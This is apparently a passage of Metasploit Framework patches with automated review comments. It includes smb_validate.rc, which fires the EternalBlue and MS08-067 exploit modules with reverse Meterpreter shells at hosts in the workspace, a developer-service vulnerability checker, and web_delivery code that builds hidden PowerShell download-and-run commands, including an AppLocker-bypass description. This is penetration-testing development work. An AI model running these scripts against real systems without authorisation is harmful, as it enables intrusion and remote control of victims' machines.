print_status("SMBv1 check job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_checks + print_status("Number of hosts to check: #{framework.db.workspace.hosts.length}") + framework.db.workspace.hosts.each do |host| + host.services.each do |serv| + next unless is_smb?(host, serv) + print_status("Checking #{host.address}:#{serv.port} (#{serv.name})") + check_smbv1(host, serv) + check_ms17_010(host, serv) + check_ms08_067_netapi(host, serv) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + print_status('Performing checks...') + do_checks + wait_until_jobs_done +end + +setup +main + + \ No newline at end of file diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc new file mode 100644 index 0000000000..88332daf28 --- /dev/null +++ b/scripts/resource/smb_validate.rc 
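Review bot: `wait_until_jobs_done` does not wait for the jobs: the unconditional `return` sits inside the `while true` body after a single `@job_ids.each` pass, so the script sleeps at most one second per still-running job and then exits while the MS17-010 and SMBv1 scans are still in flight. It should poll until none of the recorded job ids are still live, as below. Separately, `rescue ::Exception` in `check_ms08_067_netapi` also swallows `Interrupt` and `SystemExit`, so Ctrl-C during the check is reported as an error and ignored; `rescue StandardError => e` is enough. `is_smb?` only accepts port 445, so hosts that expose SMB over 139 only are never checked — worth a comment if that is intentional.
```ruby
def wait_until_jobs_done
  loop do
    running = framework.jobs.keys.map(&:to_i)
    break if (@job_ids & running).empty?
    sleep 1
  end
end
```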
@@ -0,0 +1,157 @@ + + +# +# This resource script will attempt to exploit the following vulnerabilities: +# +# * MS08-067 +# * MS17-010 +# +# It works best if you can pair it with the smb_checks.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def ms08_067_netapi_mod + framework.exploits.create('windows/smb/ms08_067_netapi') +end + +def ms17_010_mod + framework.exploits.create('windows/smb/ms17_010_eternalblue') +end + +def is_port_open?(port) + begin + sock = Socket.new(Socket::Constants::AF_INET, Socket::Constants::SOCK_STREAM, 0) + sock.bind(Socket.pack_sockaddr_in(port, get_lhost)) + rescue + return false + ensure + sock.close if sock && sock.kind_of?(Socket) + end + + true +end + +def get_x86_meterpreter_port + port_range = (4000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x64_meterpreter_port + port_range = (3000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x86_payload_name + 'windows/meterpreter/reverse_tcp' +end + +def get_x64_payload_name + 'windows/x64/meterpreter/reverse_tcp' +end + +def get_lhost + framework.datastore['LHOST'] +end + +def validate_ms08_067(vuln) + mod = ms08_067_netapi_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? 
vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x86_ayload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x86_meterpreter_port + print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x86_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def validate_ms17_010(vuln) + mod = ms17_010_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x64_payload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x64_meterpreter_port + print_status("Validating MS17-010 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x64_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_validation + framework.db.workspace.vulns.each do |vuln| + case vuln.name + when /MS17\-010/i + validate_ms17_010(vuln) + when /MS08\-067/i + validate_ms08_067(vuln) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + if framework.datastore['LHOST'] + print_status('Performing validation...') + begin + do_validation + wait_until_jobs_done + rescue RuntimeError => e + print_error(e.message) + print_error("Unable to do validation") + end + end +end + +setup +main + + \ No newline at end of file From 270ec2e9e6cb09d0cfbef6b399b5e6360b038cda Mon Sep 17 00:00:00 2001 
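Review bot: `is_port_open?` answers "can I bind this port on LHOST" — i.e. the port is free — which is the opposite of what the name suggests, and because the probe socket is closed before the exploit job's handler binds the port, every `get_x64_meterpreter_port` call restarts from 3000 (4000 for x86) and two validations launched back-to-back will very likely be handed the same LPORT, so the second reverse handler can fail to bind. Rename it to `port_free?` and remember handed-out ports (`@used_ports ||= []`, `next if @used_ports.include?(port)`, `@used_ports << port` before returning). `is_smb?` is defined here but never called, and `main` silently does nothing when LHOST is unset — an `else` branch with `print_error('LHOST is not set; use setg LHOST <ip>')` would make that visible. `wait_until_jobs_done` returns after one pass over `@job_ids` (the `return` is inside the `while true` body) rather than looping until the jobs finish, so the script can exit while exploits are still running; the bare `rescue` in `is_port_open?` likewise hides every error, not just bind failures.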
From: Jeffrey Martin Date: Tue, 24 Oct 2017 16:39:01 -0500 Subject: [PATCH 038/254] Bump rex-socket to pick up better certs --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 934e2c31f6..572a93e651 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -288,7 +288,7 @@ GEM metasm rex-core rex-text - rex-socket (0.1.8) + rex-socket (0.1.9) rex-core rex-sslscan (0.1.5) rex-core From 80aba7264c725184d4c7583783163fbbafdbef27 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 25 Oct 2017 10:33:25 +0530 Subject: [PATCH 039/254] Update ibm_lotus_notes2.rb --- modules/auxiliary/dos/http/ibm_lotus_notes2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index aabd3b5041..4513c9dfda 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary [ 'EXPLOIT-DB', '42604'], [ 'CVE', '2017-1130' ] ], - 'DisclosureDate' => 'August 31 2017', + 'DisclosureDate' => 'Aug 31 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' From c4c093b249d27ce7797cb07084f7f4c5384e9b3d Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 07:06:18 -0500 Subject: [PATCH 040/254] Method typo fix. --- scripts/resource/smb_validate.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc index 88332daf28..1df6c51c23 100644 --- a/scripts/resource/smb_validate.rc +++ b/scripts/resource/smb_validate.rc 
@@ -80,7 +80,7 @@ def validate_ms08_067(vuln) mod = ms08_067_netapi_mod mod.datastore['RHOST'] = vuln.host.address mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 - mod.datastore['PAYLOAD'] = get_x86_ayload_name + mod.datastore['PAYLOAD'] = get_x86_payload_name mod.datastore['LHOST'] = get_lhost mod.datastore['LPORT'] = get_x86_meterpreter_port print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") From 4fc0eb0cb3807defdc8f2a81ad6b30b34829ca6c Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 10:11:25 -0500 Subject: [PATCH 041/254] New resource script to check for development-related vulns. --- scripts/resource/dev_checks.rc | 118 +++++++++++++++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 scripts/resource/dev_checks.rc diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc new file mode 100644 index 0000000000..24ecc52907 --- /dev/null +++ b/scripts/resource/dev_checks.rc 
@@ -0,0 +1,118 @@ + + +# +# This resource script will check for vulnerabilities related to +# programs and services used by developers, including the following: +# +# * NodeJS debug (multi/misc/nodejs_v8_debugger) +# * distcc (unix/misc/distcc_exe) +# * Jenkins (linux/misc/jenkins_java_deserialize) +# * GitHub Enterprise (linux/http/github_enterprise_secret) +# +# It is worth noting that ONLY CHECKS are performed, no active exploiting. +# This makes it safe to run in many environments. +# +# Author: +# pbarry-r7 +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def check_exploit(host:, mod_name:, vuln_check_ret_val:) + begin + mod = framework.exploits.create(mod_name) + mod.datastore['RHOST'] = host.address + print_line("Looking for #{mod.name}...") + result = mod.check_simple({'RunAsJob': true, 'LocalOutput': self.output}) + @job_ids << mod.job_id if mod.job_id + if vuln_check_ret_val.index(result) + print_line("HOST #{host.address} APPEARS VULNERABLE TO #{mod.name}") + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as likely vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def setup + # Test and see if we have a database connected + begin + framework.db.hosts + rescue ::ActiveRecord::ConnectionNotEstablished + print_error("Database connection isn't established") + return false + end + + run_single("setg verbose true") + + true +end + +def main + framework.db.workspace.hosts.each do |host| + print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") + + check_exploit(host: host, + mod_name: 'multi/misc/nodejs_v8_debugger', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + 
mod_name: 'unix/misc/distcc_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'unix/misc/qnx_qconn_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'linux/misc/jenkins_java_deserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'linux/http/github_enterprise_secret', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'multi/http/traq_plugin_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/builderengine_upload_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/mantisbt_php_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/vbulletin_unserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + end + wait_until_jobs_done +end + +abort("Error during setup, exiting.") unless setup +main + + From 84686e1ab1ca35a20761278f50fb6cb4b75d31bd Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 11:41:14 -0500 Subject: [PATCH 042/254] Fix formatting. --- scripts/resource/dev_checks.rc | 41 +++++++++++++++++----------------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 24ecc52907..3d119410b1 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc 
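Review bot: `check_simple({'RunAsJob': true, 'LocalOutput': self.output})` uses the `'key': value` shorthand, which produces symbol keys (`:RunAsJob`, `:LocalOutput`), whereas the sibling SMB resource scripts pass string keys (`'RunAsJob' => true`); if `check_simple` looks these options up by string key, both are silently ignored here — the check runs synchronously and its output is dropped. Use `{ 'RunAsJob' => true, 'LocalOutput' => self.output }` to remove the ambiguity. `wait_until_jobs_done` also returns after a single pass over `@job_ids` (the `return` is inside the `while true` body), so it does not actually wait for jobs still running; loop until `(@job_ids & framework.jobs.keys.map(&:to_i)).empty?` instead. And `rescue ::Exception` in `check_exploit` swallows `Interrupt`/`SystemExit`; `rescue StandardError => e` is sufficient.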
@@ -70,45 +70,46 @@ def main print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") check_exploit(host: host, - mod_name: 'multi/misc/nodejs_v8_debugger', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/misc/nodejs_v8_debugger', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'unix/misc/distcc_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'unix/misc/distcc_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'unix/misc/qnx_qconn_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'unix/misc/qnx_qconn_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'linux/misc/jenkins_java_deserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'linux/misc/jenkins_java_deserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'linux/http/github_enterprise_secret', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'linux/http/github_enterprise_secret', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'multi/http/traq_plugin_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/traq_plugin_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'multi/http/builderengine_upload_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/builderengine_upload_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'multi/http/mantisbt_php_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/mantisbt_php_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 
'multi/http/vbulletin_unserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/vbulletin_unserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) end + wait_until_jobs_done end From 02a28395773e565329d017d9a36df0ba73fdb850 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 14:46:41 -0500 Subject: [PATCH 043/254] fix my comments from #8933 --- modules/exploits/multi/script/web_delivery.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,16 +163,13 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#(unknown)')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) + download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end From a402686d7af268773ef39c9e29bb13e90679ae91 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 14:58:49 -0500 Subject: [PATCH 044/254] add missing spec for singles/python/shell_bind_tcp --- spec/modules/payloads_spec.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) 
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 5fc0730837..0678c405ba 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2370,6 +2370,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'python/meterpreter_reverse_tcp' end + context 'python/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/python/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'python/shell_bind_tcp' + end + context 'python/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 9961c70cda74e4a4b4a070dde52421caccf8df74 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 15:07:36 -0500 Subject: [PATCH 045/254] missing update to Gemfile.lock --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 572a93e651..f1f9e72094 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.73) + rex-powershell (< 0.1.78) rex-random_identifier rex-registry rex-rop_builder From 43aac0ca5ef5dcae58fd58ceede56d695b0cfb81 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:39:23 -0500 Subject: [PATCH 046/254] PR feedback and add java module and scanner. --- scripts/resource/dev_checks.rc | 79 ++++++++++++++++------------------ 1 file changed, 36 insertions(+), 43 deletions(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 3d119410b1..538266fdd5 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -12,8 +12,9 @@ # It is worth noting that ONLY CHECKS are performed, no active exploiting. # This makes it safe to run in many environments. # -# Author: -# pbarry-r7 +# Authors: +# * pbarry-r7 +# * dmohanty-r7 # @job_ids = [] 
@@ -29,6 +30,17 @@ def wait_until_jobs_done end end +def run_scanner(host:, mod_name:) + begin + mod = framework.auxiliary.create(mod_name) + mod.datastore['RHOSTS'] = host.address + print_line("Running the #{mod.name}...") + result = mod.run_simple({'RunAsJob': true, 'LocalOutput': self.output}) + rescue ::Exception => e + print_error(e.message) + end +end + def check_exploit(host:, mod_name:, vuln_check_ret_val:) begin mod = framework.exploits.create(mod_name) @@ -53,9 +65,7 @@ end def setup # Test and see if we have a database connected - begin - framework.db.hosts - rescue ::ActiveRecord::ConnectionNotEstablished + if not (framework.db and framework.db.active) print_error("Database connection isn't established") return false end 
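Review bot: `run_scanner` launches the module with `'RunAsJob': true` but never records `mod.job_id` in `@job_ids`, unlike `check_exploit`, so `wait_until_jobs_done` at the end of `main` will not wait for the java_rmi_server scan and the script can finish while it is still running; add `@job_ids << mod.job_id if mod.job_id` after the `run_simple` call and drop the unused `result` local. The options hash also uses the `'RunAsJob': true` shorthand, which yields symbol keys; if `run_simple` reads string keys these options are ignored, so `{ 'RunAsJob' => true, 'LocalOutput' => self.output }` is the safer spelling. In the third hunk, `if not (framework.db and framework.db.active)` reads more idiomatically as `unless framework.db && framework.db.active`.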
@@ -69,45 +79,28 @@ def main framework.db.workspace.hosts.each do |host| print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") - check_exploit(host: host, - mod_name: 'multi/misc/nodejs_v8_debugger', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + # Modules + { 'multi/misc/nodejs_v8_debugger': [ Exploit::CheckCode::Appears ], + 'unix/misc/distcc_exec': [ Exploit::CheckCode::Vulnerable ], + 'unix/misc/qnx_qconn_exec': [ Exploit::CheckCode::Vulnerable ], + 'linux/misc/jenkins_java_deserialize': [ Exploit::CheckCode::Vulnerable ], + 'linux/http/github_enterprise_secret': [ Exploit::CheckCode::Vulnerable ], + 'multi/http/traq_plugin_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/builderengine_upload_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/mantisbt_php_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], + 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], + 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + check_exploit(host: host, + mod_name: mod.to_s, + vuln_check_ret_val: ret_val) + end - check_exploit(host: host, - mod_name: 'unix/misc/distcc_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'unix/misc/qnx_qconn_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'linux/misc/jenkins_java_deserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'linux/http/github_enterprise_secret', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'multi/http/traq_plugin_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'multi/http/builderengine_upload_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - 
check_exploit(host: host, - mod_name: 'multi/http/mantisbt_php_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'multi/http/vbulletin_unserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + # Scanners + [ 'scanner/misc/java_rmi_server' ].each do |mod| + run_scanner(host: host, mod_name: mod.to_s) + end end wait_until_jobs_done From f458f214db54740ee30360641ae2dd2808ee03bd Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:43:25 -0500 Subject: [PATCH 047/254] Loop do, yo. --- scripts/resource/dev_checks.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 538266fdd5..99ded22aa7 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -20,7 +20,7 @@ @job_ids = [] def wait_until_jobs_done - while true + loop do @job_ids.each do |job_id| current_job_ids = framework.jobs.keys.map { |e| e.to_i } sleep 1 if current_job_ids.include?(job_id) From eb3f7f949ba367c6e4d415341dae8c78ba18cf82 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:45:59 -0500 Subject: [PATCH 048/254] Fix formatting (again, sigh...). --- scripts/resource/dev_checks.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 99ded22aa7..9cecf722d2 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc 
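Review bot: Mapping `multi/misc/java_jmx_server` to `[Appears, Detected]` means a bare `CheckCode::Detected` — the service was found, not shown to be vulnerable — prints "APPEARS VULNERABLE" and writes a `report_vuln` record whose info text says "flagged as likely vulnerable", which will seed false positives into the workspace vuln table that other resource scripts (e.g. smb_validate.rc) use to drive exploitation. Either drop `Detected` from that list or handle it separately in `check_exploit`, e.g. `print_line("HOST #{host.address} exposes #{mod.name}; verify manually")` without calling `report_vuln`. The hash also uses symbol-key shorthand only to call `mod.to_s` on each key; plain string keys (`'multi/misc/nodejs_v8_debugger' => [ Exploit::CheckCode::Appears ]`) avoid the conversion.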
@@ -91,7 +91,7 @@ def main 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, - Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| check_exploit(host: host, mod_name: mod.to_s, vuln_check_ret_val: ret_val) From 0a858cdaa9435695ee84c3081e3be5ee4b11c3d1 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:13:00 -0500 Subject: [PATCH 049/254] Revert "fix my comments from #8933" This reverts commit 02a28395773e565329d017d9a36df0ba73fdb850. --- modules/exploits/multi/script/web_delivery.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index c73bbff5f7..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,13 +163,16 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#(unknown)')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file) + download_string = Rex::Powershell::PshMethods.download_run(url, file}) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) end From 87d34bef6321ddea2530b126e930a3e32753c764 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:13:25 -0500 Subject: [PATCH 050/254] Revert "missing update to Gemfile.lock" This reverts commit 9961c70cda74e4a4b4a070dde52421caccf8df74. --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
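Review bot: The new side of the `download_run` line carries a stray closing brace, `download_run(url, file})`, which is a syntax error that keeps the whole module from loading; the call should read `download_string = Rex::Powershell::PshMethods.download_run(url, file)`. The same line, brace included, is added again by the PATCH 052 hunk that restores `gen_psh` in this file. The enclosing `gen_psh` method begins outside the hunk.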
diff --git a/Gemfile.lock b/Gemfile.lock index f1f9e72094..572a93e651 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.78) + rex-powershell (< 0.1.73) rex-random_identifier rex-registry rex-rop_builder From ca28abf2a26e3e4e8d8ad7831191957842aea815 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:19:14 -0500 Subject: [PATCH 051/254] Revert "Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)" This reverts commit 4999606b61a4f4a2542f51d94236cce2e953bfc3, reversing changes made to 4274b764737f094bf498d8e63e2d16f8fd5a603a. --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 154 ++++-------------- .../misc/regsvr32_applocker_bypass_server.rb | 3 - 3 files changed, 35 insertions(+), 124 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 7bf217c2c3..6accc821ad 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..9adc1dacb4 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb 
@@ -8,7 +8,6 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking - include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer 
@@ -16,34 +15,22 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command which will allow for a payload to download and execute. - It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe - for bypassing application whitelisting. The main purpose of this module is to quickly establish - a session on a target machine when the attacker has to manually type in the command: - e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. - This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. - - When using either of the PSH targets, ensure the payload architecture matches the target computer - or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. - - Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. - The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included - PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) - can occur on the same port. - - "PSH (Binary)" will write a file to the disk, allowing for 